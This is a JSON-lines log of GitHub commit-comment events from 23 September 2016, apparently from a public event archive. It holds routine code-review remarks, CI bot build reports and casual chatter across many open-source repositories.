{"id":"4607052987","type":"CommitCommentEvent","actor":{"login":"lolilolicon"},"repo":{"name":"fogleman/primitive"},"payload":{"comment":{"id":19142203,"position":null,"line":null,"path":null,"commit_id":"9caadaaf0fc28bff585c9657997151c1abfc44c4","created_at":"2016-09-23T07:43:01Z","updated_at":"2016-09-23T07:43:01Z","body":"Convenient, but overloading the `-o` option like this is bad.\r\nSimply the presence of `%` in the filename given to `-o` triggers saving frames... that is very unexpected and undocumented.\r\nSo please make saving frames another option."}},"created_at":"2016-09-23T07:43:01Z"}
{"id":"4607053313","type":"CommitCommentEvent","actor":{"login":"saxamaphone69"},"repo":{"name":"qqueue/c4"},"payload":{"comment":{"id":19142204,"position":null,"line":null,"path":null,"commit_id":"a74dab59bdf4d7204a5940fc675ec6b0bcad12d4","created_at":"2016-09-23T07:43:07Z","updated_at":"2016-09-23T07:43:07Z","body":"😱 Am I dreaming, or did this happen?"}},"created_at":"2016-09-23T07:43:07Z"}
{"id":"4607054811","type":"CommitCommentEvent","actor":{"login":"stefanklein"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19142207,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-23T07:43:33Z","updated_at":"2016-09-23T07:43:33Z","body":"library: superelastixlib\r\n\r\nexecutable: superelastix\r\n\r\n\r\nOn 23-09-2016 01:04, Kasper Marstal wrote:\r\n\r\nI think the beauty of the library-first principle is that the command line program is just an application of the library. And here we show how to use the library. An example 😁\r\n\r\nIn any case, this is up for discussion. I did not name the executable \"superelastix\" because the is already the name of the superelastix library target, and cmake will then complain. We can think about renaming the library then?\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/kaspermarstal/SuperElastix/commit/42478b0cf10b2bf64e96b204a8cd507d5669a1d8#commitcomment-19138317>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAultYp5qrA2BZIzQnn4dJewNC7RMt_Oks5qswmFgaJpZM4KDuQb>.\r\n\r\n\r\n--\r\nStefan Klein\r\n+31 10 7043442\r\nhttp://www.bigr.nl/people/StefanKlein\r\n"}},"created_at":"2016-09-23T07:43:33Z"}
{"id":"4607054910","type":"CommitCommentEvent","actor":{"login":"pogzie"},"repo":{"name":"basho/basho_docs"},"payload":{"comment":{"id":19142208,"position":null,"line":null,"path":null,"commit_id":"4346db2ed9cbe919d0731b3ea49f682dc1a38945","created_at":"2016-09-23T07:43:35Z","updated_at":"2016-09-23T07:43:35Z","body":"Spotted this too and tested. +1 but this would cascade the new table format to other examples for Riak TS clients."}},"created_at":"2016-09-23T07:43:35Z"}
{"id":"4607055284","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142210,"position":217,"line":561,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:43:42Z","updated_at":"2016-09-23T07:43:42Z","body":"We need to think about the ordering of these includes - with them *below* the template/custom CSS include we are allowing bootstrap to override CSS we've applied in the template.\r\n\r\nWe probably want these \"library\" items to be included before the custom stuff - if that makes sense?"}},"created_at":"2016-09-23T07:43:42Z"}
{"id":"4607055982","type":"CommitCommentEvent","actor":{"login":"mraspaud"},"repo":{"name":"khunger/trollduction"},"payload":{"comment":{"id":19142217,"position":13,"line":1269,"path":"trollduction/producer.py","commit_id":"883a536a42853d78382131a9745101ba2b0954e9","created_at":"2016-09-23T07:43:54Z","updated_at":"2016-09-23T07:43:54Z","body":"\"Copy\" here is a bit missleading, you actually re-save the file, right ?"}},"created_at":"2016-09-23T07:43:54Z"}
{"id":"4607058398","type":"CommitCommentEvent","actor":{"login":"lolilolicon"},"repo":{"name":"fogleman/primitive"},"payload":{"comment":{"id":19142219,"position":41,"line":87,"path":"main.go","commit_id":"9caadaaf0fc28bff585c9657997151c1abfc44c4","created_at":"2016-09-23T07:44:35Z","updated_at":"2016-09-23T07:44:35Z","body":":-1:"}},"created_at":"2016-09-23T07:44:35Z"}
{"id":"4607059125","type":"CommitCommentEvent","actor":{"login":"cookace"},"repo":{"name":"cookace/education"},"payload":{"comment":{"id":19142224,"position":5,"line":20,"path":"test.html","commit_id":"0ac226cfc444e3dc06d2a175189b1bd56a4315c4","created_at":"2016-09-23T07:44:46Z","updated_at":"2016-09-23T07:44:46Z","body":"> 바오밥입니다.\r\n\r\n 를 추가하였습니다."}},"created_at":"2016-09-23T07:44:46Z"}
{"id":"4607063012","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142231,"position":267,"line":630,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:45:50Z","updated_at":"2016-09-23T07:45:50Z","body":"During my tests, I had to cast these to an int using `intval()` - all of the config options on the Widget are stored as strings, so we have to convert after.\r\n\r\nWe can either use the sanitizer to do that for us, or use `intval()` - it is probably best to use the Sanitizer as good practice.\r\n\r\n`$this->getSanitizer()->int($this->getOption('widgetOriginalWidth');`"}},"created_at":"2016-09-23T07:45:50Z"}
{"id":"4607065229","type":"CommitCommentEvent","actor":{"login":"spaldon1"},"repo":{"name":"twixo007/TIS-girl_in_team"},"payload":{"comment":{"id":19142235,"position":null,"line":null,"path":null,"commit_id":"0a6f7aa0ab95f1a584a3731aa247c155454f0199","created_at":"2016-09-23T07:46:27Z","updated_at":"2016-09-23T07:46:27Z","body":"komentuje spaldon je to fixnute"}},"created_at":"2016-09-23T07:46:27Z"}
{"id":"4607065540","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142237,"position":270,"line":633,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:46:32Z","updated_at":"2016-09-23T07:46:32Z","body":"We probably don't need it because we aren't using any of the JS based bootstrap functionality - if we don't need it then lets not add it."}},"created_at":"2016-09-23T07:46:32Z"}
{"id":"4607065588","type":"CommitCommentEvent","actor":{"login":"JoeButler99"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":19142239,"position":null,"line":null,"path":null,"commit_id":"34d48eb89bfd680f0acba0b7ab936a5e9eb7726d","created_at":"2016-09-23T07:46:33Z","updated_at":"2016-09-23T07:46:33Z","body":"Will this change make it into a release soon? "}},"created_at":"2016-09-23T07:46:33Z"}
{"id":"4607066572","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142242,"position":126,"line":408,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:46:50Z","updated_at":"2016-09-23T07:46:50Z","body":"Yap, this is a bug. Removing...  :+1: \r\n"}},"created_at":"2016-09-23T07:46:50Z"}
{"id":"4607068508","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142249,"position":null,"line":null,"path":null,"commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:47:20Z","updated_at":"2016-09-23T07:47:20Z","body":"One last comment - we need to change \"Powered by Forecast\" to \"Powered by DarkSky\" as the provider has re-branded"}},"created_at":"2016-09-23T07:47:20Z"}
{"id":"4607068876","type":"CommitCommentEvent","actor":{"login":"Boby55"},"repo":{"name":"twixo007/TIS-girl_in_team"},"payload":{"comment":{"id":19142251,"position":null,"line":null,"path":null,"commit_id":"e16fbad8a36dba122fcd3d0465afe2d29dbae3ac","created_at":"2016-09-23T07:47:26Z","updated_at":"2016-09-23T07:47:26Z","body":"fix,ok "}},"created_at":"2016-09-23T07:47:26Z"}
{"id":"4607069407","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142253,"position":7,"line":84,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:47:34Z","updated_at":"2016-09-23T07:47:34Z","body":"I will swap it for the minified. :+1: \r\n"}},"created_at":"2016-09-23T07:47:34Z"}
{"id":"4607069557","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142254,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/Factory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:47:37Z","updated_at":"2016-09-23T07:47:37Z","body":"sure"}},"created_at":"2016-09-23T07:47:37Z"}
{"id":"4607071305","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142259,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/TypedFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:48:06Z","updated_at":"2016-09-23T07:48:06Z","body":"I'd call it EnumFactory"}},"created_at":"2016-09-23T07:48:06Z"}
{"id":"4607073544","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142262,"position":217,"line":561,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:48:42Z","updated_at":"2016-09-23T07:48:42Z","body":"You are right! :) makes a lot of sense, I will reorganise them. :+1: \r\n"}},"created_at":"2016-09-23T07:48:42Z"}
{"id":"4607075084","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"qqueue/c4"},"payload":{"comment":{"id":19142269,"position":null,"line":null,"path":null,"commit_id":"a74dab59bdf4d7204a5940fc675ec6b0bcad12d4","created_at":"2016-09-23T07:49:10Z","updated_at":"2016-09-23T07:49:10Z","body":"it did happen"}},"created_at":"2016-09-23T07:49:10Z"}
{"id":"4607075281","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142270,"position":27,"line":27,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/FsDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:49:13Z","updated_at":"2016-09-23T07:49:13Z","body":"1. should be 1 indent instead of 2\r\n2. invalid line breaks"}},"created_at":"2016-09-23T07:49:13Z"}
{"id":"4607076022","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"qqueue/c4"},"payload":{"comment":{"id":19142275,"position":null,"line":null,"path":null,"commit_id":"a74dab59bdf4d7204a5940fc675ec6b0bcad12d4","created_at":"2016-09-23T07:49:26Z","updated_at":"2016-09-23T07:49:26Z","body":"we never thought the day you get rid of your anime avatar would happen either, but hey it did"}},"created_at":"2016-09-23T07:49:26Z"}
{"id":"4607083684","type":"CommitCommentEvent","actor":{"login":"jalgamestudios"},"repo":{"name":"TeamEisprinzessin/secret-wolf"},"payload":{"comment":{"id":19142290,"position":6,"line":20,"path":"server/index.php","commit_id":"15ba113f8d61ec4c48f16c01f05b132750a412d9","created_at":"2016-09-23T07:51:24Z","updated_at":"2016-09-23T07:51:24Z","body":"How can our eyes be real if the universe is not"}},"created_at":"2016-09-23T07:51:24Z"}
{"id":"4607085457","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142295,"position":null,"line":null,"path":null,"commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:51:53Z","updated_at":"2016-09-23T07:51:53Z","body":"factory is very good but we need a way to launch the services for drivers and generatos\r\nmoreover, the monitor's Main class should be moved to a separate \"runner\" unit which should build into mongoose.jar launcher\r\nwe should use mongoose.jar to run the app instead of mongoose-monitor.jar\r\nrunner also will include the scenario engine functionality in the near future"}},"created_at":"2016-09-23T07:51:53Z"}
{"id":"4607087490","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19142298,"position":null,"line":null,"path":null,"commit_id":"6c5740011c2b1169c869e6f77f36b5ae26534098","created_at":"2016-09-23T07:52:24Z","updated_at":"2016-09-23T07:52:24Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2302 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.26%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T07:52:24Z"}
{"id":"4607089268","type":"CommitCommentEvent","actor":{"login":"Mahi"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19142305,"position":null,"line":null,"path":null,"commit_id":"f4061002ab6088f3b01f98af5ac99526bf73cc4b","created_at":"2016-09-23T07:52:53Z","updated_at":"2016-09-23T07:52:53Z","body":"This is looking good! I highly believe you should've used keyword argument for this though"}},"created_at":"2016-09-23T07:52:53Z"}
{"id":"4607089326","type":"CommitCommentEvent","actor":{"login":"jorgemarcial"},"repo":{"name":"jorgemarcial/TableBundle"},"payload":{"comment":{"id":19142306,"position":null,"line":null,"path":null,"commit_id":"a3cc8b821fd23e032d6b3b655d51f2bec0fe800c","created_at":"2016-09-23T07:52:54Z","updated_at":"2016-09-23T07:52:54Z","body":"use JGM\\TableBundle\\Table\\DataSource\\DbalDataSource;\r\nuse JGM\\TableBundle\\Table\\Column\\TextColumn;\r\nuse JGM\\TableBundle\\Table\\Filter\\TextFilter;\r\n\r\nclass ExampleTable  extends AbstractTableType\r\n{\r\n    public function buildTable(TableBuilder $builder)\r\n    {\r\n            $builder\r\n                ->add(TextColumn::class, 'nameExample1', 'info' => ['rootAlias' => 'ex'] ])\r\n                ->add(TextColumn::class, 'nameExample2' ,'info' => ['rootAlias' => 'ex2'] ])\r\n            ;\r\n    }\r\n\r\n    public function buildFilter(FilterBuilder $filterBuilder)\r\n    {\r\n        $filterBuilder\r\n            ->add(TextFilter::class, 'nameExample1, 'info' => ['rootAlias' => 'ugr'])\r\n            ->add(TextFilter::class, 'nameExample2, 'info' => ['rootAlias' => 'ex2'])\r\n        ;\r\n    }\r\n\r\n   public function getDataSource(ContainerInterface $container)\r\n    {\r\n          $sql['fields] = \"*\";\r\n          $sql['body'] = \"SELECT {fields} FROM `EXAMPLE_TABLE` ex LEFT JOIN `id` ex2 ON ex.id = ex2.id\";\r\n          return new DbalDataSource($sql);\r\n    }\r\n}\r\n"}},"created_at":"2016-09-23T07:52:54Z"}
{"id":"4607089796","type":"CommitCommentEvent","actor":{"login":"mrwogu"},"repo":{"name":"Martin-Wegner/ng2-bootstrap"},"payload":{"comment":{"id":19142307,"position":11,"line":42,"path":"README.md","commit_id":"b2f9689053f4a3eb03bac4ca28284f7eac09527a","created_at":"2016-09-23T07:53:02Z","updated_at":"2016-09-23T07:53:02Z","body":"You have typo `mpn` -> `npm`"}},"created_at":"2016-09-23T07:53:02Z"}
{"id":"4607093021","type":"CommitCommentEvent","actor":{"login":"Martin-Wegner"},"repo":{"name":"Martin-Wegner/ng2-bootstrap"},"payload":{"comment":{"id":19142318,"position":11,"line":42,"path":"README.md","commit_id":"b2f9689053f4a3eb03bac4ca28284f7eac09527a","created_at":"2016-09-23T07:53:53Z","updated_at":"2016-09-23T07:53:53Z","body":"Ups :( Thanks!"}},"created_at":"2016-09-23T07:53:53Z"}
{"id":"4607096360","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"zharkovav/coala"},"payload":{"comment":{"id":19142329,"position":17,"line":192,"path":"coalib/settings/ConfigurationGathering.py","commit_id":"4c9ad30140e5b9589f8318b8b8c6edef8cd3a953","created_at":"2016-09-23T07:54:43Z","updated_at":"2016-09-23T07:54:43Z","body":"Are there other cases potentially?"}},"created_at":"2016-09-23T07:54:43Z"}
{"id":"4607096681","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/sergiomo71"},"payload":{"comment":{"id":19142332,"position":2,"line":2,"path":"README.md","commit_id":"2c0abf949548230ea554cc42277ed8d44dcb7e35","created_at":"2016-09-23T07:54:47Z","updated_at":"2016-09-23T07:54:47Z","body":"For xbox"}},"created_at":"2016-09-23T07:54:47Z"}
{"id":"4607099507","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/sergiomo71"},"payload":{"comment":{"id":19142340,"position":null,"line":null,"path":null,"commit_id":"2c0abf949548230ea554cc42277ed8d44dcb7e35","created_at":"2016-09-23T07:55:27Z","updated_at":"2016-09-23T07:55:27Z","body":"For ps4"}},"created_at":"2016-09-23T07:55:27Z"}
{"id":"4607101658","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19142351,"position":4,"line":4,"path":"src/js/filters/idToNick.js","commit_id":"d84cfcea8096147b9b5adfe11ed3bfdd77d938a6","created_at":"2016-09-23T07:56:02Z","updated_at":"2016-09-23T07:56:02Z","body":"@llopv we already had this method for this, maybe it is not the \"angular way\"\r\n\r\nhttps://github.com/P2Pvalue/teem/blob/master/src/js/services/user.js#L56"}},"created_at":"2016-09-23T07:56:02Z"}
{"id":"4607101687","type":"CommitCommentEvent","actor":{"login":"lleirborras"},"repo":{"name":"ifad/chronomodel"},"payload":{"comment":{"id":19142352,"position":8,"line":4,"path":".travis.yml","commit_id":"28ead1458f575cc1d3b5c804b1b2078850408b59","created_at":"2016-09-23T07:56:02Z","updated_at":"2016-09-23T07:56:02Z","body":"Can you add 2.2.5 as it's the latest stable version on 2.2 branch as of now?\r\n\r\nhttps://www.ruby-lang.org/en/downloads/\r\n\r\nThanks"}},"created_at":"2016-09-23T07:56:02Z"}
{"id":"4607109971","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142380,"position":null,"line":null,"path":null,"commit_id":"6be9810ae03f96573f2aac4af699c553baf9cadc","created_at":"2016-09-23T07:58:10Z","updated_at":"2016-09-23T07:58:10Z","body":"Cái hình quá to, logo cần hình nhỏ thôi để web load nhanh"}},"created_at":"2016-09-23T07:58:10Z"}
{"id":"4607110065","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19142381,"position":null,"line":null,"path":null,"commit_id":"661df18a884bd7adde6df47b7dc3a368ce981b6e","created_at":"2016-09-23T07:58:10Z","updated_at":"2016-09-23T07:58:10Z","body":"What is the actual workaround part?"}},"created_at":"2016-09-23T07:58:10Z"}
{"id":"4607110399","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19142383,"position":null,"line":null,"path":null,"commit_id":"6c5740011c2b1169c869e6f77f36b5ae26534098","created_at":"2016-09-23T07:58:17Z","updated_at":"2016-09-23T07:58:17Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-23T07:58:17Z"}
{"id":"4607111764","type":"CommitCommentEvent","actor":{"login":"saxamaphone69"},"repo":{"name":"qqueue/c4"},"payload":{"comment":{"id":19142387,"position":null,"line":null,"path":null,"commit_id":"a74dab59bdf4d7204a5940fc675ec6b0bcad12d4","created_at":"2016-09-23T07:58:37Z","updated_at":"2016-09-23T07:58:37Z","body":"🔥 If it makes you feel better, I still don't know how to build this script, nor have made my own ES6 4chan X-esque Chrome extension. Those things, never change."}},"created_at":"2016-09-23T07:58:37Z"}
{"id":"4607113358","type":"CommitCommentEvent","actor":{"login":"daisy124"},"repo":{"name":"jordenwilson/canon-printer-support"},"payload":{"comment":{"id":19142391,"position":null,"line":null,"path":null,"commit_id":"d1ab929f76fd25d0d14e3a9e6f52fdcb0d3a6740","created_at":"2016-09-23T07:59:02Z","updated_at":"2016-09-23T07:59:02Z","body":"Thanks for sharing this post.........Its very helpful\r\nhttp://bit.ly/2bRxTla\r\n"}},"created_at":"2016-09-23T07:59:02Z"}
{"id":"4607114933","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCoreLegacy/TrinityCore"},"payload":{"comment":{"id":19142396,"position":null,"line":null,"path":null,"commit_id":"32b780bffd31796b9f4a9e0a1fb9a200ef4701a6","created_at":"2016-09-23T07:59:26Z","updated_at":"2016-09-23T07:59:26Z","body":"I have seen them enabled on arkcore so...."}},"created_at":"2016-09-23T07:59:26Z"}
{"id":"4607115614","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142398,"position":11,"line":22,"path":"modules/custom/htn/js/nghia.js","commit_id":"53f840657c22172e83529cc760c85a2f7f80598b","created_at":"2016-09-23T07:59:37Z","updated_at":"2016-09-23T07:59:37Z","body":"dùng selector riêng\r\n"}},"created_at":"2016-09-23T07:59:37Z"}
{"id":"4607116552","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142402,"position":6,"line":18,"path":"modules/custom/htn/js/nghia.js","commit_id":"53f840657c22172e83529cc760c85a2f7f80598b","created_at":"2016-09-23T07:59:51Z","updated_at":"2016-09-23T07:59:51Z","body":"dùng selector riêng"}},"created_at":"2016-09-23T07:59:51Z"}
{"id":"4607117145","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19142403,"position":null,"line":null,"path":null,"commit_id":"8de59e147d2991819907eefc7fe9c72fbb0cfe6a","created_at":"2016-09-23T08:00:00Z","updated_at":"2016-09-23T08:00:00Z","body":"os_2_0_fix_static_build (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8de59e147d2991819907eefc7fe9c72fbb0cfe6a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8de59e147d2991819907eefc7fe9c72fbb0cfe6a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T08:00:00Z"}
{"id":"4607117454","type":"CommitCommentEvent","actor":{"login":"andre-merzky"},"repo":{"name":"radical-cybertools/radical.analytics"},"payload":{"comment":{"id":19142404,"position":null,"line":null,"path":null,"commit_id":"a34dbb3a8efe86eca24983b5f422ae89c2f459d4","created_at":"2016-09-23T08:00:04Z","updated_at":"2016-09-23T08:00:04Z","body":"Nice plots!  :)  :+1: \r\n\r\nI still stumble over the different TT names.  Not that I mind the names specifically, but I wonder if we are on the page wrt. the semantic content.  If you are not tired of discussing those things, can we sync on that at some point? :)"}},"created_at":"2016-09-23T08:00:04Z"}
{"id":"4607120218","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142413,"position":18,"line":29,"path":"modules/custom/htn/js/nghia.js","commit_id":"53f840657c22172e83529cc760c85a2f7f80598b","created_at":"2016-09-23T08:00:42Z","updated_at":"2016-09-23T08:00:42Z","body":"bỏ dòng này đi, vụ logo anh sẽ lo"}},"created_at":"2016-09-23T08:00:42Z"}
{"id":"4607121972","type":"CommitCommentEvent","actor":{"login":"natalia-osa"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19142418,"position":96,"line":93,"path":"MapView/Map/RMConfiguration.m","commit_id":"5d12b057ae9c199794077d0b3daddbeac28b5eb0","created_at":"2016-09-23T08:01:07Z","updated_at":"2016-09-23T08:01:07Z","body":"It was deleted yesterday in 11ee27c1a279543a0cc64a5f031322cfe52c6307 :). Because of this commented out block the commit message is [part 1]. This commented code was one of the reasons I've mentioned it'd be good to review all changes at once instead of commit by commit. This commit was just a \"first working solution\" without being pretty."}},"created_at":"2016-09-23T08:01:07Z"}
{"id":"4607125419","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142425,"position":21,"line":32,"path":"modules/custom/htn/js/nghia.js","commit_id":"53f840657c22172e83529cc760c85a2f7f80598b","created_at":"2016-09-23T08:01:58Z","updated_at":"2016-09-23T08:01:58Z","body":"Bỏ dòng này đi vụ bản quyền anh sẽ lo"}},"created_at":"2016-09-23T08:01:58Z"}
{"id":"4607129163","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142436,"position":61,"line":89,"path":"modules/custom/htn/css/nghia.css","commit_id":"b7c283041291541c8194d26e51779ad34e1fa5d1","created_at":"2016-09-23T08:02:55Z","updated_at":"2016-09-23T08:02:55Z","body":"Dùng selector riêng"}},"created_at":"2016-09-23T08:02:55Z"}
{"id":"4607130195","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142437,"position":124,"line":149,"path":"modules/custom/htn/css/nghia.css","commit_id":"b7c283041291541c8194d26e51779ad34e1fa5d1","created_at":"2016-09-23T08:03:11Z","updated_at":"2016-09-23T08:03:11Z","body":"selector riêng\r\n"}},"created_at":"2016-09-23T08:03:11Z"}
{"id":"4607130908","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"lorenzhs/thrill"},"payload":{"comment":{"id":19142440,"position":null,"line":null,"path":null,"commit_id":"bc63d9f3e359a68b4a668875371742dd4ee4c56c","created_at":"2016-09-23T08:03:21Z","updated_at":"2016-09-23T08:03:21Z","body":"@bingmann this allows building thrill with TBB using clang and libstdc++ — should I send a PR?"}},"created_at":"2016-09-23T08:03:21Z"}
{"id":"4607131338","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19142441,"position":134,"line":161,"path":"modules/custom/htn/css/nghia.css","commit_id":"b7c283041291541c8194d26e51779ad34e1fa5d1","created_at":"2016-09-23T08:03:29Z","updated_at":"2016-09-23T08:03:29Z","body":"selector riêng"}},"created_at":"2016-09-23T08:03:29Z"}
{"id":"4607131411","type":"CommitCommentEvent","actor":{"login":"semdoc"},"repo":{"name":"DonkeyCoyote/proprietary_vendor_huawei"},"payload":{"comment":{"id":19142442,"position":64,"line":47,"path":"angler/angler-vendor.mk","commit_id":"c48312eaf4678b58c61a2e2821586afe6cfe8303","created_at":"2016-09-23T08:03:29Z","updated_at":"2016-09-23T08:03:29Z","body":"Build  fails with line 47.\r\nYou have symlink created done in device/huawei/angler/aosp/Android.mk\r\nhttps://github.com/omnirom/android_device_huawei_angler/blob/android-7.0/aosp/Android.mk#L21"}},"created_at":"2016-09-23T08:03:29Z"}
{"id":"4607132609","type":"CommitCommentEvent","actor":{"login":"zreigz"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19142448,"position":21,"line":199,"path":"pkg/kubectl/configmap.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-23T08:03:48Z","updated_at":"2016-09-23T08:03:48Z","body":"OK, I got it.  "}},"created_at":"2016-09-23T08:03:48Z"}
{"id":"4607132853","type":"CommitCommentEvent","actor":{"login":"niljr"},"repo":{"name":"niljr/tlc"},"payload":{"comment":{"id":19142449,"position":3,"line":1,"path":"newfile.txt","commit_id":"9eebd7f656ebc01c483db0c0cf8d0eaea1f1fd82","created_at":"2016-09-23T08:03:52Z","updated_at":"2016-09-23T08:03:52Z","body":"Sala ubra mo mac"}},"created_at":"2016-09-23T08:03:52Z"}
{"id":"4607132963","type":"CommitCommentEvent","actor":{"login":"groxxda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19142450,"position":null,"line":null,"path":null,"commit_id":"8c1f927258e9beeeaa78ff3dbc4965f46558a639","created_at":"2016-09-23T08:03:55Z","updated_at":"2016-09-23T08:03:55Z","body":"#18857 :arrow_right:  :toilet: "}},"created_at":"2016-09-23T08:03:55Z"}
